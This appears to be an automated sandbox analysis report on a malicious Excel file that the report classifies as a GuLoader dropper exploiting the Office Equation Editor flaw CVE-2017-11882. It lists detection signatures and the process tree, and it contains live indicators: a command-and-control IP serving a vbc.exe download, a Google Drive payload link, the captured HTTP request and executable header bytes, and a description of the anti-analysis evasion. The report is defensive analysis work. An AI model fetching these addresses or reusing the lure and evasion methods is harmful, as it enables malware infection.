Loading ...

Play interactive tourEdit tour

Windows Analysis Report #U0110#U1eb6T MUA H#U00c0NG VNU_014092021.xlsx

Overview

General Information

Sample Name:#U0110#U1eb6T MUA H#U00c0NG VNU_014092021.xlsx
Analysis ID:483661
MD5:4a1d13469a6c817242e8b567bf34ab9a
SHA1:a0d54f6c1205defad5f31cadf3393880e7c4c862
SHA256:65514d1bcd58f206fbc6339c7893a4dc5fb3e7de39177038eac73906ec5c622c
Tags:LokiVelvetSweatshopxlsx
Infos:

Most interesting Screenshot:

Detection

GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Sigma detected: EQNEDT32.EXE connecting to internet
Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Sigma detected: Droppers Exploiting CVE-2017-11882
Sigma detected: File Dropped By EQNEDT32EXE
Antivirus detection for URL or domain
GuLoader behavior detected
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Yara detected GuLoader
Hides threads from debuggers
Tries to detect Any.run
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Sigma detected: Execution from Suspicious Folder
Office equation editor drops PE file
Tries to detect virtualization through RDTSC time measurements
Machine Learning detection for dropped file
C2 URLs / IPs found in malware configuration
Drops PE files to the user root directory
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to call native functions
Downloads executable code via HTTP
Contains functionality for execution timing, often used to detect debuggers
Abnormal high CPU Usage
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Potential document exploit detected (unknown TCP traffic)
PE file contains strange resources
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Office Equation Editor has been started
Checks if the current process is being debugged
Drops PE files to the user directory
Potential document exploit detected (performs HTTP gets)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w7x64
  • EXCEL.EXE (PID: 2132 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)
  • EQNEDT32.EXE (PID: 1868 cmdline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • vbc.exe (PID: 2228 cmdline: 'C:\Users\Public\vbc.exe' MD5: 451E4CD68C69C2C8B8FC93AD02E8754A)
      • vbc.exe (PID: 1184 cmdline: 'C:\Users\Public\vbc.exe' MD5: 451E4CD68C69C2C8B8FC93AD02E8754A)
  • cleanup

Malware Configuration

Threatname: GuLoader

{"Payload URL": "https://drive.google.com/uc?export=download&id=1pn-b6M_RemB"}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000006.00000002.643654485.00000000003D0000.00000040.00000001.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
    00000009.00000002.695092285.00000000001B0000.00000040.00000001.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security

      Sigma Overview

      Exploits:

      barindex
      Sigma detected: EQNEDT32.EXE connecting to internetShow sources
      Source: Network ConnectionAuthor: Joe Security: Data: DestinationIp: 23.95.85.181, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 1868, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49165
      Sigma detected: File Dropped By EQNEDT32EXEShow sources
      Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 1868, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe

      System Summary:

      barindex
      Sigma detected: Droppers Exploiting CVE-2017-11882Show sources
      Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 1868, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 2228
      Sigma detected: Execution from Suspicious FolderShow sources
      Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 1868, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 2228

      Jbx Signature Overview

      Click to jump to signature section

      Show All Signature Results

      AV Detection:

      barindex
      Found malware configurationShow sources
      Source: 00000006.00000002.643654485.00000000003D0000.00000040.00000001.sdmpMalware Configuration Extractor: GuLoader {"Payload URL": "https://drive.google.com/uc?export=download&id=1pn-b6M_RemB"}
      Multi AV Scanner detection for submitted fileShow sources
      Source: #U0110#U1eb6T MUA H#U00c0NG VNU_014092021.xlsxVirustotal: Detection: 38%Perma Link
      Source: #U0110#U1eb6T MUA H#U00c0NG VNU_014092021.xlsxReversingLabs: Detection: 28%
      Antivirus detection for URL or domainShow sources
      Source: http://23.95.85.181/0789/vbc.exeAvira URL Cloud: Label: malware
      Multi AV Scanner detection for domain / URLShow sources
      Source: http://23.95.85.181/0789/vbc.exeVirustotal: Detection: 5%Perma Link
      Multi AV Scanner detection for dropped fileShow sources
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exeVirustotal: Detection: 36%Perma Link
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exeReversingLabs: Detection: 20%
      Source: C:\Users\Public\vbc.exeVirustotal: Detection: 36%Perma Link
      Source: C:\Users\Public\vbc.exeReversingLabs: Detection: 20%
      Machine Learning detection for dropped fileShow sources
      Source: C:\Users\Public\vbc.exeJoe Sandbox ML: detected
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exeJoe Sandbox ML: detected

      Exploits:

      barindex
      Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)Show sources
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe
      Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 23.95.85.181:80
      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 23.95.85.181:80
      Source: excel.exeMemory has grown: Private usage: 4MB later: 70MB

      Networking:

      barindex
      C2 URLs / IPs found in malware configurationShow sources
      Source: Malware configuration extractorURLs: https://drive.google.com/uc?export=download&id=1pn-b6M_RemB
      Source: Joe Sandbox ViewASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS
      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 15 Sep 2021 09:06:58 GMTServer: Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23Last-Modified: Wed, 15 Sep 2021 06:03:24 GMTETag: "1e000-5cc0274c3638e"Accept-Ranges: bytesContent-Length: 122880Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 8b 23 c4 db cf 42 aa 88 cf 42 aa 88 cf 42 aa 88 4c 5e a4 88 ce 42 aa 88 80 60 a3 88 cd 42 aa 88 f9 64 a7 88 ce 42 aa 88 52 69 63 68 cf 42 aa 88 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 90 8b b7 4b 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 a0 01 00 00 40 00 00 00 00 00 00 ac 17 00 00 00 10 00 00 00 b0 01 00 00 00 40 00 00 10 00 00 00 10 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 f0 01 00 00 10 00 00 60 75 02 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 24 a2 01 00 28 00 00 00 00 d0 01 00 f6 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 02 00 00 20 00 00 00 00 10 00 00 4c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 60 97 01 00 00 10 00 00 00 a0 01 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 9c 11 00 00 00 b0 01 00 00 10 00 00 00 b0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f6 16 00 00 00 d0 01 00 00 20 00 00 00 c0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 c3 1f b0 49 10 00 00 00 00 00 00 00 00 00 00 00 4d 53 56 42 56 4d 36 30 2e 44 4c 4c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
      Source: global trafficHTTP traffic detected: GET /0789/vbc.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 23.95.85.181Connection: Keep-Alive
      Source: unknownTCP traffic detected without corresponding DNS query: 23.95.85.181
      Source: unknownTCP traffic detected without corresponding DNS query: 23.95.85.181
      Source: unknownTCP traffic detected without corresponding DNS query: 23.95.85.181
      Source: unknownTCP traffic detected without corresponding DNS query: 23.95.85.181
      Source: unknownTCP traffic detected without corresponding DNS query: 23.95.85.181
      Source: unknownTCP traffic detected without corresponding DNS query: 23.95.85.181
      Source: unknownTCP traffic detected without corresponding DNS query: 23.95.85.181
      Source: unknownTCP traffic detected without corresponding DNS query: 23.95.85.181
      Source: unknownTCP traffic detected without corresponding DNS query: 23.95.85.181
      Source: unknownTCP traffic detected without corresponding DNS query: 23.95.85.181
      Source: unknownTCP traffic detected without corresponding DNS query: 23.95.85.181
      Source: unknownTCP traffic detected without corresponding DNS query: 23.95.85.181
      Source: unknownTCP traffic detected without corresponding DNS query: 23.95.85.181
      Source: unknownTCP traffic detected without corresponding DNS query: 23.95.85.181
      Source: unknownTCP traffic detected without corresponding DNS query: 23.95.85.181
      Source: unknownTCP traffic detected without corresponding DNS query: 23.95.85.181
      Source: unknownTCP traffic detected without corresponding DNS query: 23.95.85.181
      Source: unknownTCP traffic detected without corresponding DNS query: 23.95.85.181
      Source: unknownTCP traffic detected without corresponding DNS query: 23.95.85.181
      Source: unknownTCP traffic detected without corresponding DNS query: 23.95.85.181
      Source: unknownTCP traffic detected without corresponding DNS query: 23.95.85.181
      Source: unknownTCP traffic detected without corresponding DNS query: 23.95.85.181
      Source: unknownTCP traffic detected without corresponding DNS query: 23.95.85.181
      Source: unknownTCP traffic detected without corresponding DNS query: 23.95.85.181
      Source: unknownTCP traffic detected without corresponding DNS query: 23.95.85.181
      Source: unknownTCP traffic detected without corresponding DNS query: 23.95.85.181
      Source: unknownTCP traffic detected without corresponding DNS query: 23.95.85.181
      Source: unknownTCP traffic detected without corresponding DNS query: 23.95.85.181
      Source: unknownTCP traffic detected without corresponding DNS query: 23.95.85.181
      Source: unknownTCP traffic detected without corresponding DNS query: 23.95.85.181
      Source: unknownTCP traffic detected without corresponding DNS query: 23.95.85.181
      Source: unknownTCP traffic detected without corresponding DNS query: 23.95.85.181
      Source: unknownTCP traffic detected without corresponding DNS query: 23.95.85.181
      Source: unknownTCP traffic detected without corresponding DNS query: 23.95.85.181
      Source: unknownTCP traffic detected without corresponding DNS query: 23.95.85.181
      Source: unknownTCP traffic detected without corresponding DNS query: 23.95.85.181
      Source: unknownTCP traffic detected without corresponding DNS query: 23.95.85.181
      Source: unknownTCP traffic detected without corresponding DNS query: 23.95.85.181
      Source: unknownTCP traffic detected without corresponding DNS query: 23.95.85.181
      Source: unknownTCP traffic detected without corresponding DNS query: 23.95.85.181
      Source: unknownTCP traffic detected without corresponding DNS query: 23.95.85.181
      Source: unknownTCP traffic detected without corresponding DNS query: 23.95.85.181
      Source: unknownTCP traffic detected without corresponding DNS query: 23.95.85.181
      Source: unknownTCP traffic detected without corresponding DNS query: 23.95.85.181
      Source: unknownTCP traffic detected without corresponding DNS query: 23.95.85.181
      Source: unknownTCP traffic detected without corresponding DNS query: 23.95.85.181
      Source: unknownTCP traffic detected without corresponding DNS query: 23.95.85.181
      Source: unknownTCP traffic detected without corresponding DNS query: 23.95.85.181
      Source: unknownTCP traffic detected without corresponding DNS query: 23.95.85.181
      Source: unknownTCP traffic detected without corresponding DNS query: 23.95.85.181
      Source: vbc.exe, 00000006.00000002.644097038.0000000003297000.00000002.00020000.sdmpString found in binary or memory: http://localizability/practices/XML.asp
      Source: vbc.exe, 00000006.00000002.644097038.0000000003297000.00000002.00020000.sdmpString found in binary or memory: http://localizability/practices/XMLConfiguration.asp
      Source: vbc.exe, 00000006.00000002.644097038.0000000003297000.00000002.00020000.sdmpString found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
      Source: vbc.exe, 00000006.00000002.644097038.0000000003297000.00000002.00020000.sdmpString found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
      Source: EA784B99.emf.0.drString found in binary or memory: http://www.day.com/dam/1.0
      Source: vbc.exe, 00000006.00000002.644097038.0000000003297000.00000002.00020000.sdmpString found in binary or memory: http://www.icra.org/vocabulary/.
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\EA784B99.emfJump to behavior
      Source: global trafficHTTP traffic detected: GET /0789/vbc.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 23.95.85.181Connection: Keep-Alive

      System Summary:

      barindex
      Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)Show sources
      Source: Screenshot number: 4Screenshot OCR: Enable Editing from the 16 g yellow bar above ,, This document is 18 3. Once you have enabled edi
      Office equation editor drops PE fileShow sources
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exeJump to dropped file
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
      Source: C:\Users\Public\vbc.exeCode function: 6_2_003D26BE
      Source: C:\Users\Public\vbc.exeCode function: 6_2_003D9AB0
      Source: C:\Users\Public\vbc.exeCode function: 6_2_003D0EAE
      Source: C:\Users\Public\vbc.exeCode function: 6_2_003D5D1F
      Source: C:\Users\Public\vbc.exeCode function: 6_2_003D0746
      Source: C:\Users\Public\vbc.exeCode function: 6_2_003D0E3C
      Source: C:\Users\Public\vbc.exeCode function: 6_2_003D3C3F
      Source: C:\Users\Public\vbc.exeCode function: 6_2_003D4835
      Source: C:\Users\Public\vbc.exeCode function: 6_2_003D9437
      Source: C:\Users\Public\vbc.exeCode function: 6_2_003D5A2D
      Source: C:\Users\Public\vbc.exeCode function: 6_2_003D2E23
      Source: C:\Users\Public\vbc.exeCode function: 6_2_003D2C0D
      Source: C:\Users\Public\vbc.exeCode function: 6_2_003D8C0F
      Source: C:\Users\Public\vbc.exeCode function: 6_2_003D420F
      Source: C:\Users\Public\vbc.exeCode function: 6_2_003D5E07
      Source: C:\Users\Public\vbc.exeCode function: 6_2_003D5003
      Source: C:\Users\Public\vbc.exeCode function: 6_2_003D847F
      Source: C:\Users\Public\vbc.exeCode function: 6_2_003D507A
      Source: C:\Users\Public\vbc.exeCode function: 6_2_003D1077
      Source: C:\Users\Public\vbc.exeCode function: 6_2_003D8C73
      Source: C:\Users\Public\vbc.exeCode function: 6_2_003D8464
      Source: C:\Users\Public\vbc.exeCode function: 6_2_003D4266
      Source: C:\Users\Public\vbc.exeCode function: 6_2_003D9C63
      Source: C:\Users\Public\vbc.exeCode function: 6_2_003D3A50
      Source: C:\Users\Public\vbc.exeCode function: 6_2_003D0844
      Source: C:\Users\Public\vbc.exeCode function: 6_2_003D0847
      Source: C:\Users\Public\vbc.exeCode function: 6_2_003D10BD
      Source: C:\Users\Public\vbc.exeCode function: 6_2_003D4CB6
      Source: C:\Users\Public\vbc.exeCode function: 6_2_003D3AB1
      Source: C:\Users\Public\vbc.exeCode function: 6_2_003D92B3
      Source: C:\Users\Public\vbc.exeCode function: 6_2_003D20A8
      Source: C:\Users\Public\vbc.exeCode function: 6_2_003D469F
      Source: C:\Users\Public\vbc.exeCode function: 6_2_003D149E
      Source: C:\Users\Public\vbc.exeCode function: 6_2_003D309B
      Source: C:\Users\Public\vbc.exeCode function: 6_2_003D4E8F
      Source: C:\Users\Public\vbc.exeCode function: 6_2_003D46F9
      Source: C:\Users\Public\vbc.exeCode function: 6_2_003D2EFB
      Source: C:\Users\Public\vbc.exeCode function: 6_2_003D48F4
      Source: C:\Users\Public\vbc.exeCode function: 6_2_003D46DE
      Source: C:\Users\Public\vbc.exeCode function: 6_2_003D9ADB
      Source: C:\Users\Public\vbc.exeCode function: 6_2_003D62C5
      Source: C:\Users\Public\vbc.exeCode function: 6_2_003D8EC2
      Source: C:\Users\Public\vbc.exeCode function: 6_2_003D4B39
      Source: C:\Users\Public\vbc.exeCode function: 6_2_003D493B
      Source: C:\Users\Public\vbc.exeCode function: 6_2_003D9B3B
      Source: C:\Users\Public\vbc.exeCode function: 6_2_003D4523
      Source: C:\Users\Public\vbc.exeCode function: 6_2_003D491A
      Source: C:\Users\Public\vbc.exeCode function: 6_2_003D4512
      Source: C:\Users\Public\vbc.exeCode function: 6_2_003D2B0C
      Source: C:\Users\Public\vbc.exeCode function: 6_2_003D3F06
      Source: C:\Users\Public\vbc.exeCode function: 6_2_003D1303
      Source: C:\Users\Public\vbc.exeCode function: 6_2_003D0973
      Source: C:\Users\Public\vbc.exeCode function: 6_2_003D4D73
      Source: C:\Users\Public\vbc.exeCode function: 6_2_003D175B
      Source: C:\Users\Public\vbc.exeCode function: 6_2_003D0F57
      Source: C:\Users\Public\vbc.exeCode function: 6_2_003D49BB
      Source: C:\Users\Public\vbc.exeCode function: 6_2_003D9DB7
      Source: C:\Users\Public\vbc.exeCode function: 6_2_003D8FB1
      Source: C:\Users\Public\vbc.exeCode function: 6_2_003D39AB
      Source: C:\Users\Public\vbc.exeCode function: 6_2_003D4DAB
      Source: C:\Users\Public\vbc.exeCode function: 6_2_003D59A3
      Source: C:\Users\Public\vbc.exeCode function: 6_2_003D879B
      Source: C:\Users\Public\vbc.exeCode function: 6_2_003D4D95
      Source: C:\Users\Public\vbc.exeCode function: 6_2_003D2F96
      Source: C:\Users\Public\vbc.exeCode function: 6_2_003D8D8F
      Source: C:\Users\Public\vbc.exeCode function: 6_2_003D4D89
      Source: C:\Users\Public\vbc.exeCode function: 6_2_003D5D81
      Source: C:\Users\Public\vbc.exeCode function: 6_2_003D3383
      Source: C:\Users\Public\vbc.exeCode function: 6_2_003D7FFF
      Source: C:\Users\Public\vbc.exeCode function: 6_2_003D51F3
      Source: C:\Users\Public\vbc.exeCode function: 6_2_003D0DDF
      Source: C:\Users\Public\vbc.exeCode function: 6_2_003D85DA
      Source: C:\Users\Public\vbc.exeCode function: 6_2_003D61CD
      Source: C:\Users\Public\vbc.exeCode function: 6_2_003D11C7
      Source: C:\Users\Public\vbc.exeCode function: 6_2_003D2DC7
      Source: C:\Users\Public\vbc.exeCode function: 9_2_001B5CD5
      Source: C:\Users\Public\vbc.exeCode function: 9_2_001B421B
      Source: C:\Users\Public\vbc.exeCode function: 9_2_001B2E13
      Source: C:\Users\Public\vbc.exeCode function: 9_2_001B4208
      Source: C:\Users\Public\vbc.exeCode function: 9_2_001B5003
      Source: C:\Users\Public\vbc.exeCode function: 9_2_001B5E07
      Source: C:\Users\Public\vbc.exeCode function: 9_2_001B9437
      Source: C:\Users\Public\vbc.exeCode function: 9_2_001B4835
      Source: C:\Users\Public\vbc.exeCode function: 9_2_001B5A2D
      Source: C:\Users\Public\vbc.exeCode function: 9_2_001B507A
      Source: C:\Users\Public\vbc.exeCode function: 9_2_001B8C73
      Source: C:\Users\Public\vbc.exeCode function: 9_2_001B2E64
      Source: C:\Users\Public\vbc.exeCode function: 9_2_001B469F
      Source: C:\Users\Public\vbc.exeCode function: 9_2_001B9C8B
      Source: C:\Users\Public\vbc.exeCode function: 9_2_001B4E8F
      Source: C:\Users\Public\vbc.exeCode function: 9_2_001B92B3
      Source: C:\Users\Public\vbc.exeCode function: 9_2_001B9AB0
      Source: C:\Users\Public\vbc.exeCode function: 9_2_001B4CB6
      Source: C:\Users\Public\vbc.exeCode function: 9_2_001B18AA
      Source: C:\Users\Public\vbc.exeCode function: 9_2_001B3AA5
      Source: C:\Users\Public\vbc.exeCode function: 9_2_001B9ADB
      Source: C:\Users\Public\vbc.exeCode function: 9_2_001B8EC2
      Source: C:\Users\Public\vbc.exeCode function: 9_2_001B9B3B
      Source: C:\Users\Public\vbc.exeCode function: 9_2_001B4B39
      Source: C:\Users\Public\vbc.exeCode function: 9_2_001B4933
      Source: C:\Users\Public\vbc.exeCode function: 9_2_001B5D30
      Source: C:\Users\Public\vbc.exeCode function: 9_2_001B4523
      Source: C:\Users\Public\vbc.exeCode function: 9_2_001B8F9F
      Source: C:\Users\Public\vbc.exeCode function: 9_2_001B4D95
      Source: C:\Users\Public\vbc.exeCode function: 9_2_001B8D8F
      Source: C:\Users\Public\vbc.exeCode function: 9_2_001B5D81
      Source: C:\Users\Public\vbc.exeCode function: 9_2_001B8FB1
      Source: C:\Users\Public\vbc.exeCode function: 9_2_001B9DB7
      Source: C:\Users\Public\vbc.exeCode function: 9_2_001B4DAB
      Source: C:\Users\Public\vbc.exeCode function: 9_2_001B8BAC
      Source: C:\Users\Public\vbc.exeCode function: 9_2_001B59A3
      Source: C:\Users\Public\vbc.exeCode function: 9_2_001B3DA1
      Source: C:\Users\Public\vbc.exeCode function: 9_2_001B7DA0
      Source: C:\Users\Public\vbc.exeCode function: 9_2_001B7FFF
      Source: C:\Users\Public\vbc.exeCode function: 9_2_001B8BFF
      Source: C:\Users\Public\vbc.exeCode function: 9_2_001B49EB
      Source: C:\Users\Public\vbc.exeCode function: 6_2_003D26BE NtWriteVirtualMemory,
      Source: C:\Users\Public\vbc.exeCode function: 6_2_003D0EAE CloseServiceHandle,NtWriteVirtualMemory,TerminateProcess,LoadLibraryA,
      Source: C:\Users\Public\vbc.exeCode function: 6_2_003D5D1F NtWriteVirtualMemory,NtAllocateVirtualMemory,
      Source: C:\Users\Public\vbc.exeCode function: 6_2_003D958B NtProtectVirtualMemory,
      Source: C:\Users\Public\vbc.exeCode function: 6_2_003D4835 NtWriteVirtualMemory,
      Source: C:\Users\Public\vbc.exeCode function: 6_2_003D960D NtProtectVirtualMemory,
      Source: C:\Users\Public\vbc.exeCode function: 6_2_003D8C0F NtWriteVirtualMemory,
      Source: C:\Users\Public\vbc.exeCode function: 6_2_003D5E07 NtAllocateVirtualMemory,
      Source: C:\Users\Public\vbc.exeCode function: 6_2_003D5003 NtWriteVirtualMemory,
      Source: C:\Users\Public\vbc.exeCode function: 6_2_003D507A NtWriteVirtualMemory,
      Source: C:\Users\Public\vbc.exeCode function: 6_2_003D4266 NtWriteVirtualMemory,
      Source: C:\Users\Public\vbc.exeCode function: 6_2_003D4CB6 NtWriteVirtualMemory,
      Source: C:\Users\Public\vbc.exeCode function: 6_2_003D469F NtWriteVirtualMemory,
      Source: C:\Users\Public\vbc.exeCode function: 6_2_003D4E8F NtWriteVirtualMemory,
      Source: C:\Users\Public\vbc.exeCode function: 6_2_003D46F9 NtWriteVirtualMemory,
      Source: C:\Users\Public\vbc.exeCode function: 6_2_003D48F4 NtWriteVirtualMemory,
      Source: C:\Users\Public\vbc.exeCode function: 6_2_003D46DE NtWriteVirtualMemory,
      Source: C:\Users\Public\vbc.exeCode function: 6_2_003D4B39 NtWriteVirtualMemory,
      Source: C:\Users\Public\vbc.exeCode function: 6_2_003D493B NtWriteVirtualMemory,
      Source: C:\Users\Public\vbc.exeCode function: 6_2_003D4523 NtWriteVirtualMemory,
      Source: C:\Users\Public\vbc.exeCode function: 6_2_003D491A NtWriteVirtualMemory,
      Source: C:\Users\Public\vbc.exeCode function: 6_2_003D4D73 NtWriteVirtualMemory,
      Source: C:\Users\Public\vbc.exeCode function: 6_2_003D49BB NtWriteVirtualMemory,
      Source: C:\Users\Public\vbc.exeCode function: 6_2_003D4DAB NtWriteVirtualMemory,
      Source: C:\Users\Public\vbc.exeCode function: 6_2_003D4D95 NtWriteVirtualMemory,
      Source: C:\Users\Public\vbc.exeCode function: 6_2_003D4D89 NtWriteVirtualMemory,
      Source: C:\Users\Public\vbc.exeCode function: 6_2_003D5D81 NtAllocateVirtualMemory,
      Source: C:\Users\Public\vbc.exeCode function: 6_2_003D51F3 NtWriteVirtualMemory,
      Source: C:\Users\Public\vbc.exeCode function: 9_2_001B5CD5 NtAllocateVirtualMemory,
      Source: C:\Users\Public\vbc.exeCode function: 9_2_001B5E07 NtAllocateVirtualMemory,
      Source: C:\Users\Public\vbc.exeCode function: 9_2_001B5D30 NtAllocateVirtualMemory,
      Source: C:\Users\Public\vbc.exeCode function: 9_2_001B5D81 NtAllocateVirtualMemory,
      Source: C:\Users\Public\vbc.exeProcess Stats: CPU usage > 98%
      Source: vbc[1].exe.4.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
      Source: vbc.exe.4.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
      Source: C:\Users\Public\vbc.exeMemory allocated: 76F90000 page execute and read and write
      Source: C:\Users\Public\vbc.exeMemory allocated: 76E90000 page execute and read and write
      Source: C:\Users\Public\vbc.exeMemory allocated: 76F90000 page execute and read and write
